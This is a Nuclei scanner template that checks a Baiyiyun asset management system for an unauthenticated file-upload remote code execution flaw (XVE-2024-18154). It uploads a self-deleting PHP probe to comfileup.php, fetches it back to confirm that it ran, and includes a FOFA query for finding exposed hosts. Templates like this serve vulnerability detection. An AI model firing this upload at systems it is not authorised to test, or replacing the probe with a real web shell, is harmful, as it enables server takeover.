http:
    - extractors:
        - group: 1
          internal: true
          name: uploadfile
          part: body
          regex:
            - (\w+\d.+?\.php)
          type: regex
      raw:
        - |
          POST /comfileup.php HTTP/1.1
          Host: {{Hostname}}
          Content-Type: multipart/form-data; boundary=--------1110146050

          ----------1110146050
          Content-Disposition: form-data; name="file";filename="test.php"

          <?php print(111*222);unlink(__FILE__);?>
          ----------1110146050--
    - matchers:
        - part: body
          type: word
          words:
            - "24642"
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /uploads/{{uploadfile}} HTTP/1.1
          Host: {{Hostname}}
id: baiyiyun-comfileup-File-upload
info:
    author: Superhero
    description: |-
        fofa: body="不要着急，点此"
        百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞，未经身份验证的攻击者通过漏洞上传恶意后门文件，执行任意代码，从而获取到服务器权限。
    name: 百易云资产管理运营系统 comfileup.php 文件上传致RCE漏洞(XVE-2024-18154)
    reference:
        - https://blog.csdn.net/m0_60571842/article/details/140770008
    severity: high
    tags:
        - 百易云资产管理运营系统
